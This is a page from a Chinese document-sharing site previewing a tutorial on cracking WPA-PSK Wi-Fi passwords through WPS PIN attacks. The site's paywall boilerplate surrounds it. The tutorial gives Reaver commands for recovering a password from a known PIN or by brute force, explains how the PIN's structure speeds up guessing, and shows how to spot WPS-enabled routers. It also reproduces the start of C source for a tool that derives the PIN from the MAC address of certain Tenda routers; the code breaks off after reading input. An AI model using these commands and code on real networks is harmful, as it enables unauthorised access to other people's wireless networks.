破解WIF无线网络密码之使用Reaver PIN码破解WPA-PSK密.docVIP

下载本文档

8
0
约3.65万字
约 7页
2016-12-24 发布于河南
举报
版权申诉

破解WIF无线网络密码之使用Reaver PIN码破解WPA-PSK密.doc

1、原创力文档（book118）网站文档一经付费（服务费），不意味着购买了该文档的版权，仅供个人/单位学习、研究之用，不得用于商业用途，未经授权，严禁复制、发行、汇编、翻译或者网络传播等，侵权必究。。
2、本站所有内容均由合作方或网友上传，本站不对文档的完整性、权威性及其观点立场正确性做任何保证或承诺！文档内容仅供研究参考，付费前请自行鉴别。如您付费，意味着您自己接受本站规则且自行承担风险，本站不退款、不进行额外附加服务；查看《如何避免下载的几个坑》。如果您已付费下载过本站文档，您可以点击这里二次下载。
3、如文档侵犯商业秘密、侵犯著作权、侵犯人身权等，请点击“版权申诉”（推荐），也可以打举报电话：400-050-0827(电话支持时间：9:00-18:30)。
4、该文档为VIP文档，如果想要下载，成为VIP会员后，下载免费。
5、成为VIP后，下载本文档将扣除1次下载权益。下载后，不支持退款、换文档。如有疑问请联系我们。
6、成为VIP后，您将拥有八大权益，权益包括：VIP文档下载权益、阅读免打扰、文档格式转换、高级专利检索、专属身份标志、高级客服、多端互通、版权登记。
7、VIP文档为合作方或网友上传，每下载1次，网站将根据用户上传文档的质量评分、类型等，对文档贡献者给予高额补贴、流量扶持。如果你也想贡献VIP文档。上传文档

破解WIFI无线网络密码之使用Reaver+PIN码破解WPA-PSK密码使用Reaver+PIN码破解WIFI无线网络WPA-PSK密码：之前掌握到的破解WPA-PSK密码仅限于使用aircreack工具包获取handshake后挂字典爆破方式，而能否破解出wpa密码完全依赖于字典强度了。除了该方式外还有一个更有效的办法，就是使用路由PIN码然后使用BT5下自带的Reaver工具秒破WPA-PSK密码！在已知PIN码的情况下可以在BT5下使用 reaver -i mon0 -b AP‘s Mac -p pin 直接秒破！现在比较难的就是怎么得到PIN的问题了，经常关注无线这方面的朋友应该知道现在腾达和磊科产品有保PIN算法漏洞，如果路由MAC地址是以“C83A35”或“00B00C”打头那么可以直接计算出PIN值，然后使用PIN值直接连接或者继续使用PIN值加reaver破解出wpa-psk。除此之外，根据PIN特点同样也可以使用Reaver来穷举，pin码是一个8位数前四位是随机生成的而后4位是3个数字加1个checksum大大降低了穷举所需要的时间。在BT5下可以使用 reaver -i mon0 -b APs Mac -vv 来破解，这个过程可能需要花很多个小时，在网上有看到是3-10个小时，具体的我还未验证。reaver在此过程中还会保存进度（/usr/local/etc/reaver/AP’s MAC.wpc）到文件。不过使用PIN方法破解WPA-PSK密码有一个限制，就是AP必须开启了QSS、WPS功能！我们可以在扫描AP的时候判断目标AP是否开启了QSS、WPS功能，如下图使用airodump-ng扫描时候在MB栏中后面有个“.”的就是。或者在win7下面，连接AP时候在密码输入框下面有“通过按路由器按钮也可以连接”字样也是开启了QSS、wps的。 “C83A35”或“00B00C”打头路由PIN计算工具源码，大家可以自己编译： //Computes PIN code starts with OUI C83A35 and 00B00C //Both two OUIs which belonged to Tenda Technology Co., Ltd are confirmed effectively. //Coded by Zhaochunsheng - iB //Modified by Lingxi - WiFiBETA.COM #include stdio.h #include stdlib.h #include stdafx.h int main() { unsigned int wps_pin_checksum(unsigned int pin); int PIN = 0; // printf(ComputePIN-C83A35\n); printf(Description:\n); printf(If your wireless router MAC address start with \C83A35\ or \00B00C\,\n); printf(type the other six digits, you might be able to get the \n); printf(WPS-PIN of this equipment, please have a try, good luck!\n\n); printf(Code by ZhaoChunsheng 04/07/2012 \n\n); printf(Modified by Lingxi - WiFiBETA.COM\n\n); //Translated to Chinese printf(说明：\n); printf(如果您的无线路由器MAC地址以“C83A35”或“00B00C”打头，\n); printf(输入后六位MAC地址（不分大小写）您或许可以获得该路由的WPS PIN密钥！\n); printf(祝你好运！\n\n); printf(由赵春生编写于2012年4月7日 Http://iB\n); printf(由灵曦修改并汉化 WiFiBETA.COM\n\n); printf(请输入后六位MAC地址（HEX）：\n); printf(Input the last 6 digits of MAC Address(HEX):); scanf(%x,PIN); printf(Last 6 digits of MAC Address(HEX) are: %X\n,PIN);